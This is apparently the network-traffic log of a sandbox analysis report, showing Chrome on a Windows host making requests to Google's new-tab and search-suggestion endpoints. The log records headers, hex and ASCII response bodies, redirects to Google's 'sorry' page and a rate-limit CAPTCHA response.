                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      2024-12-21 20:06:28 UTC1266INData Raw: 35 31 35 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 74 66 32 20 63 6f 6d 69 63 73 22 2c 22 6f 6e 65 20 70 69 65 63 65 20 63 68 61 70 74 65 72 20 31 31 33 34 20 73 70 6f 69 6c 65 72 73 20 72 65 64 64 69 74 22 2c 22 77 6f 6d 65 6e 20 76 6f 6c 6c 65 79 62 61 6c 6c 20 63 68 61 6d 70 69 6f 6e 73 68 69 70 22 2c 22 77 6f 6d 65 6e 20 76 6f 6c 6c 65 79 62 61 6c 6c 20 63 68 61 6d 70 69 6f 6e 73 68 69 70 22 2c 22 64 6f 77 20 6a 6f 6e 65 73 20 73 74 6f 63 6b 20 6d 61 72 6b 65 74 73 22 2c 22 64 61 6c 6c 61 73 20 6d 61 76 65 72 69 63 6b 73 22 2c 22 67 6f 6f 67 6c 65 20 70 69 78 65 6c 20 39 20 70 72 6f 22 2c 22 6e 75 6e 61 20 62 61 62 79 20 65 73 73 65 6e 74 69 61 6c 73 20 63 61 72 20 73 65 61 74 20 72 65 63 61 6c 6c 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c
                                                                                                                                                                                                                                                      Data Ascii: 515)]}'["",["tf2 comics","one piece chapter 1134 spoilers reddit","women volleyball championship","women volleyball championship","dow jones stock markets","dallas mavericks","google pixel 9 pro","nuna baby essentials car seat recall"],["","","","","",
                                                                                                                                                                                                                                                      2024-12-21 20:06:28 UTC42INData Raw: 6c 72 63 47 74 31 64 6a 4e 4d 55 6d 46 4b 53 54 56 45 63 46 4a 4e 61 31 4e 45 52 79 73 77 5a 58 42 78 59 32 56 47 54 46 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: lrcGt1djNMUmFKSTVEcFJNa1NERyswZXBxY2VGTF
                                                                                                                                                                                                                                                      2024-12-21 20:06:28 UTC1255INData Raw: 32 30 33 36 0d 0a 6c 79 53 32 70 70 52 30 70 52 57 6a 68 51 55 45 64 56 52 57 64 42 61 30 4e 4f 54 6d 68 30 62 30 6b 77 63 46 4e 6e 4d 32 35 6f 65 54 4a 4d 55 32 31 34 5a 44 4e 35 59 33 6c 46 53 6b 74 72 64 69 74 4d 64 32 74 74 57 6d 6c 61 54 57 74 49 64 6c 64 7a 59 30 31 4e 53 6c 64 57 64 44 52 6f 61 55 74 44 59 33 64 46 55 45 4e 42 52 44 42 6e 61 6a 4d 7a 63 46 4e 6e 65 6d 4d 30 59 31 70 6a 55 32 74 48 4b 33 5a 34 51 31 46 74 56 58 5a 42 53 46 46 42 5a 48 5a 4d 59 6c 6c 54 55 30 46 45 56 33 52 49 51 7a 46 7a 53 45 4e 30 5a 43 39 70 56 47 6c 30 53 58 70 59 53 6b 64 58 53 6a 46 46 51 57 52 36 4b 79 39 4a 55 58 42 52 52 54 68 4d 56 33 64 59 62 53 74 32 65 45 68 56 65 6b 68 51 52 57 4a 46 59 55 4e 4f 54 69 74 72 5a 45 38 78 5a 44 4a 46 4e 46 4e 36 61 47 46
                                                                                                                                                                                                                                                      Data Ascii: 2036lyS2ppR0pRWjhQUEdVRWdBa0NOTmh0b0kwcFNnM25oeTJMU214ZDN5Y3lFSktrditMd2ttWmlaTWtIdldzY01NSldWdDRoaUtDY3dFUENBRDBnajMzcFNnemM0Y1pjU2tHK3Z4Q1FtVXZBSFFBZHZMYllTU0FEV3RIQzFzSEN0ZC9pVGl0SXpYSkdXSjFFQWR6Ky9JUXBRRThMV3dYbSt2eEhVekhQRWJFYUNOTitrZE8xZDJFNFN6aGF
                                                                                                                                                                                                                                                      2024-12-21 20:06:28 UTC1255INData Raw: 70 69 63 45 78 36 57 44 4a 55 52 53 38 76 4d 57 52 59 4e 31 6c 48 54 44 42 42 51 57 68 4f 65 6b 49 35 62 6b 46 42 51 55 59 35 56 57 78 46 55 56 5a 53 53 57 6c 61 4d 6c 63 76 56 30 39 6a 64 47 68 75 53 45 70 52 53 55 68 61 4e 32 70 5a 55 55 56 44 53 47 68 46 51 56 6c 70 57 58 4e 6a 62 6a 52 46 4e 30 38 7a 59 57 4e 79 61 7a 49 33 5a 47 39 72 57 46 6f 76 56 31 64 4f 64 54 41 31 64 47 4a 6b 4e 56 63 33 5a 48 55 72 4c 7a 6b 76 4d 33 4e 51 62 44 64 4f 62 6d 52 5a 62 48 67 76 4e 33 64 59 65 44 5a 49 61 79 74 44 55 46 52 76 52 56 46 6f 4f 56 52 4b 4f 44 68 31 63 56 70 51 55 48 56 79 4d 6d 4e 6d 4d 58 46 42 4e 31 46 47 4e 6d 38 32 5a 6a 4e 6e 55 48 64 4c 57 56 49 76 4f 58 56 4d 53 6d 74 34 5a 57 5a 69 5a 44 42 59 63 31 42 59 4e 54 6c 31 59 6a 59 72 64 57 49 79 4e
                                                                                                                                                                                                                                                      Data Ascii: picEx6WDJURS8vMWRYN1lHTDBBQWhOekI5bkFBQUY5VWxFUVZSSWlaMlcvV09jdGhuSEpRSUhaN2pZUUVDSGhFQVlpWXNjbjRFN08zYWNyazI3ZG9rWFovV1dOdTA1dGJkNVc3ZHUrLzkvM3NQbDdObmRZbHgvN3dYeDZIaytDUFRvRVFoOVRKODh1cVpQUHVyMmNmMXFBN1FGNm82ZjNnUHdLWVIvOXVMSmt4ZWZiZDBYc1BYNTl1YjYrdWIyN
                                                                                                                                                                                                                                                      2024-12-21 20:06:28 UTC1255INData Raw: 6e 45 72 64 33 4a 6a 5a 6c 56 75 59 6b 31 4c 56 30 64 55 59 56 5a 4f 4d 44 64 70 5a 32 4e 56 56 46 52 6b 63 55 4e 4e 56 30 64 4c 53 48 6c 70 61 44 46 5a 62 56 64 76 54 6e 46 59 53 30 68 6a 65 44 68 4b 55 6b 46 70 64 56 42 4c 54 6e 46 4e 63 31 42 48 4d 47 74 36 65 48 64 4c 62 55 56 70 52 31 70 76 4e 33 6c 69 59 32 64 6b 55 6b 74 44 52 6b 31 76 59 58 64 7a 54 58 70 6f 64 6c 56 55 56 56 4a 4c 55 6e 64 52 65 57 39 30 57 6d 31 4c 65 46 4e 34 4f 46 64 44 56 44 42 35 57 55 39 61 55 54 52 35 53 56 46 6d 64 30 5a 43 55 32 78 6e 63 46 4a 68 54 6b 64 35 63 6b 5a 49 52 6e 46 77 65 6c 70 48 61 54 5a 70 5a 33 64 55 52 6e 6c 43 59 56 52 34 64 79 74 58 4d 53 73 78 63 57 74 43 5a 57 68 4b 53 56 46 72 65 54 56 49 61 31 64 70 55 6b 56 76 53 58 64 6f 61 56 4e 77 64 55 70 75
                                                                                                                                                                                                                                                      Data Ascii: nErd3JjZlVuYk1LV0dUYVZOMDdpZ2NVVFRkcUNNV0dLSHlpaDFZbVdvTnFYS0hjeDhKUkFpdVBLTnFNc1BHMGt6eHdLbUVpR1pvN3liY2dkUktDRk1vYXdzTXpodlVUVVJLUndReW90Wm1LeFN4OFdDVDB5WU9aUTR5SVFmd0ZCU2xncFJhTkd5ckZIRnFwelpHaTZpZ3dURnlCYVR4dytXMSsxcWtCZWhKSVFreTVIa1dpUkVvSXdoaVNwdUpu
                                                                                                                                                                                                                                                      2024-12-21 20:06:28 UTC1255INData Raw: 59 58 6c 52 64 30 52 73 61 45 45 79 63 30 74 69 65 6a 52 32 59 6a 6b 76 59 30 46 71 4d 46 42 47 5a 46 5a 6b 53 44 64 53 4c 79 39 36 63 47 5a 4b 59 57 64 71 65 47 39 33 59 30 52 61 4e 58 46 79 59 30 35 36 65 6d 64 71 51 33 67 32 4e 45 4e 4b 63 6d 31 56 54 33 67 76 4f 56 6c 49 62 57 31 70 5a 6d 68 78 63 6a 56 6a 62 31 68 4d 53 32 70 30 4d 69 39 6d 4d 31 46 4b 64 46 68 36 57 45 52 32 5a 30 35 6d 63 44 42 51 65 6d 34 79 64 46 41 76 61 6e 52 32 56 58 51 30 4f 55 46 59 52 33 52 58 4d 6b 68 6e 64 79 73 72 62 47 59 76 4e 54 56 6b 4e 45 35 79 4f 48 5a 35 4e 44 6c 4e 61 58 4d 76 64 6b 52 6e 4e 31 63 76 54 32 70 31 64 53 38 78 4f 55 64 51 52 45 74 6a 62 45 51 79 51 33 46 49 64 32 51 77 64 69 74 71 4f 45 6c 43 63 6d 38 35 4c 30 51 34 5a 58 52 6a 4b 33 4a 31 52 57 74
                                                                                                                                                                                                                                                      Data Ascii: YXlRd0RsaEEyc0tiejR2YjkvY0FqMFBGZFZkSDdSLy96cGZKYWdqeG93Y0RaNXFyY056emdqQ3g2NENKcm1VT3gvOVlIbW1pZmhxcjVjb1hMS2p0Mi9mM1FKdFh6WER2Z05mcDBQem4ydFAvanR2VXQ0OUFYR3RXMkhndysrbGYvNTVkNE5yOHZ5NDlNaXMvdkRnN1cvT2p1dS8xOUdQREtjbEQyQ3FId2QwditqOElCcm85L0Q4ZXRjK3J1RWt
                                                                                                                                                                                                                                                      2024-12-21 20:06:28 UTC1255INData Raw: 54 6c 63 7a 59 6a 6b 35 61 31 6b 7a 56 6b 5a 48 64 56 5a 6d 63 30 52 70 4d 44 52 4b 64 43 74 4b 62 57 31 54 62 45 6c 45 63 45 52 33 61 6d 56 32 5a 54 4d 7a 4c 32 5a 6c 57 45 5a 44 52 6d 4e 35 65 6e 49 34 62 58 49 78 64 6e 4e 53 63 6a 51 34 54 55 78 4c 61 58 42 46 52 57 35 51 53 57 45 78 53 6a 49 34 56 32 68 75 63 48 70 61 62 69 73 72 4d 6d 30 34 5a 32 64 4b 52 6b 46 58 65 44 68 34 59 30 52 74 51 54 52 4d 5a 6b 56 32 4d 57 78 6f 5a 57 52 59 53 7a 46 73 64 55 46 7a 61 53 74 50 63 6a 68 47 65 58 4e 76 55 58 46 31 61 32 78 6f 4d 54 52 4d 52 57 4e 49 63 32 5a 50 4c 30 5a 58 52 54 46 6f 53 45 34 7a 4e 55 64 36 4e 55 56 77 65 47 56 47 52 46 6c 32 4f 57 4a 4c 5a 7a 42 45 55 54 46 4b 54 31 45 7a 55 30 4a 58 51 6d 77 33 54 6e 64 32 54 30 52 43 54 48 51 33 56 56 63
                                                                                                                                                                                                                                                      Data Ascii: TlczYjk5a1kzVkZHdVZmc0RpMDRKdCtKbW1TbElEcER3amV2ZTMzL2ZlWEZDRmN5enI4bXIxdnNScjQ4TUxLaXBFRW5QSWExSjI4V2hucHpabisrMm04Z2dKRkFXeDh4Y0RtQTRMZkV2MWxoZWRYSzFsdUFzaStPcjhGeXNvUXF1a2xoMTRMRWNIc2ZPL0ZXRTFoSE4zNUd6NUVweGVGRFl2OWJLZzBEUTFKT1EzU0JXQmw3Tnd2T0RCTHQ3VVc
                                                                                                                                                                                                                                                      2024-12-21 20:06:28 UTC1255INData Raw: 46 65 6c 56 4b 5a 46 68 55 63 6b 46 53 51 53 39 68 4d 6a 46 4b 53 46 4a 71 53 57 45 79 52 55 74 49 54 32 5a 74 63 47 39 69 4e 6b 31 53 55 55 64 56 54 30 6c 55 5a 45 52 32 63 6d 31 36 51 31 46 50 61 45 74 45 53 31 6c 42 56 6e 4a 4c 52 30 78 6b 64 47 56 33 4d 45 6f 79 61 6c 42 79 55 6a 4e 49 64 46 70 47 56 46 4a 69 54 6e 5a 49 4d 6d 4a 7a 59 6a 68 7a 57 6a 6c 35 52 6b 31 6d 51 6b 52 71 61 6c 70 58 5a 45 70 6e 5a 45 64 50 57 58 6b 35 63 55 4a 6d 56 46 4e 43 56 6e 52 6e 54 6b 78 73 62 56 6b 77 5a 55 78 76 56 6a 55 34 56 44 46 50 4d 30 56 54 5a 55 6c 4e 59 6c 64 70 53 7a 42 76 57 6a 42 48 53 55 4e 4c 51 32 6b 79 5a 32 4e 61 65 57 31 33 4e 55 68 48 55 58 6f 76 4d 46 42 4b 55 6c 4a 6a 62 32 68 4f 56 56 52 58 4f 48 52 57 54 6c 70 33 63 58 56 68 52 32 68 79 53 48
                                                                                                                                                                                                                                                      Data Ascii: FelVKZFhUckFSQS9hMjFKSFJqSWEyRUtIT2ZtcG9iNk1SUUdVT0lUZER2cm16Q1FPaEtES1lBVnJLR0xkdGV3MEoyalByUjNIdFpGVFJiTnZIMmJzYjhzWjl5Rk1mQkRqalpXZEpnZEdPWXk5cUJmVFNCVnRnTkxsbVkwZUxvVjU4VDFPM0VTZUlNYldpSzBvWjBHSUNLQ2kyZ2NaeW13NUhHUXovMFBKUlJjb2hOVVRXOHRWTlp3cXVhR2hySH
                                                                                                                                                                                                                                                      2024-12-21 20:06:28 UTC724INData Raw: 5a 6b 53 58 6b 78 57 6d 56 75 5a 30 31 34 4e 33 70 44 62 6a 56 4b 5a 6a 51 31 54 45 49 35 55 55 4e 47 64 48 46 5a 55 33 4e 71 4e 32 39 31 61 6a 56 4c 59 6d 5a 45 52 46 42 75 4d 48 59 76 62 6b 31 6a 62 55 46 42 59 58 67 7a 63 57 74 76 59 33 68 53 63 32 68 4d 54 45 46 36 4e 43 39 42 4b 32 56 32 53 30 6c 55 5a 33 70 6b 55 6a 6c 69 4f 54 67 77 55 47 63 77 61 32 78 6b 5a 58 4e 4d 57 6d 78 58 59 6a 67 76 4c 30 31 46 56 44 4a 36 4f 48 59 76 5a 32 5a 32 52 31 70 5a 53 55 4e 44 51 30 68 61 51 55 46 42 51 55 46 43 53 6c 4a 56 4e 55 56 79 61 30 70 6e 5a 32 63 39 50 54 6f 51 52 47 46 73 62 47 46 7a 49 45 31 68 64 6d 56 79 61 57 4e 72 63 30 6f 48 49 7a 41 7a 4e 57 4a 68 4d 31 49 36 5a 33 4e 66 63 33 4e 77 50 57 56 4b 65 6d 6f 30 64 45 52 51 4d 56 52 6d 53 58 6c 72 4d
                                                                                                                                                                                                                                                      Data Ascii: ZkSXkxWmVuZ014N3pDbjVKZjQ1TEI5UUNGdHFZU3NqN291ajVLYmZERFBuMHYvbk1jbUFBYXgzcWtvY3hSc2hMTEF6NC9BK2V2S0lUZ3pkUjliOTgwUGcwa2xkZXNMWmxXYjgvL01FVDJ6OHYvZ2Z2R1pZSUNDQ0haQUFBQUFCSlJVNUVya0pnZ2c9PToQRGFsbGFzIE1hdmVyaWNrc0oHIzAzNWJhM1I6Z3Nfc3NwPWVKemo0dERQMVRmSXlrM
                                                                                                                                                                                                                                                      2024-12-21 20:06:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      5192.168.11.2049763172.217.15.1964438052C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-12-21 20:06:28 UTC710OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIk6HLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4B
                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                      Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
                                                                                                                                                                                                                                                      2024-12-21 20:06:29 UTC844INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                      Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjNGMS_nLsGIjA0ik1s4JVq9eOJpsVlOM2gI-DLgMPidfxSgxq5jVmu_BWE0kM6B2QcsTf8YS-EqZsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                                                                                                                                                      x-hallmonitor-challenge: CgsIxb-cuwYQiLCNTxIEZoGYzQ
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                                                                                                      Date: Sat, 21 Dec 2024 20:06:29 GMT
                                                                                                                                                                                                                                                      Server: gws
                                                                                                                                                                                                                                                      Content-Length: 458
                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-12-21 20:06:29 UTC411INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 25 33 46 68
                                                                                                                                                                                                                                                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh
                                                                                                                                                                                                                                                      2024-12-21 20:06:29 UTC47INData Raw: 6b 56 55 58 30 31 46 55 31 4e 42 52 30 56 61 41 55 4d 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: kVUX01FU1NBR0VaAUM">here</A>.</BODY></HTML>


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      6192.168.11.2049764172.217.15.1964438052C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-12-21 20:06:28 UTC553OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                      Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
                                                                                                                                                                                                                                                      2024-12-21 20:06:29 UTC762INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                      Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjNGMS_nLsGIjAeKkU8fuiGNfH1GNGe4bKzU792jorXUJawIOeaOJy1_dG9sWahqozDrID_PZwKGOwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                                                                                                                                                      x-hallmonitor-challenge: CgsIxb-cuwYQ7taUTRIEZoGYzQ
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                                                                                                      Date: Sat, 21 Dec 2024 20:06:29 GMT
                                                                                                                                                                                                                                                      Server: gws
                                                                                                                                                                                                                                                      Content-Length: 417
                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-12-21 20:06:29 UTC417INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26
                                                                                                                                                                                                                                                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      7192.168.11.2049762172.217.15.1964438052C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-12-21 20:06:29 UTC727OUTGET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjNGMS_nLsGIjAeKkU8fuiGNfH1GNGe4bKzU792jorXUJawIOeaOJy1_dG9sWahqozDrID_PZwKGOwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                      Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
                                                                                                                                                                                                                                                      2024-12-21 20:06:29 UTC356INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                                                      Date: Sat, 21 Dec 2024 20:06:29 GMT
                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                      Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                      Server: HTTP server (unknown)
                                                                                                                                                                                                                                                      Content-Length: 3136
                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-12-21 20:06:29 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64
                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
                                                                                                                                                                                                                                                      2024-12-21 20:06:29 UTC1255INData Raw: 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 36 67 51 42 68 37 52 30 4a 6d 69 45 42 61 55 6d 65 43 47 77 6d 69 6e 43 34 4c 49 34 43 51 55 35 61
                                                                                                                                                                                                                                                      Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="6gQBh7R0JmiEBaUmeCGwminC4LI4CQU5a
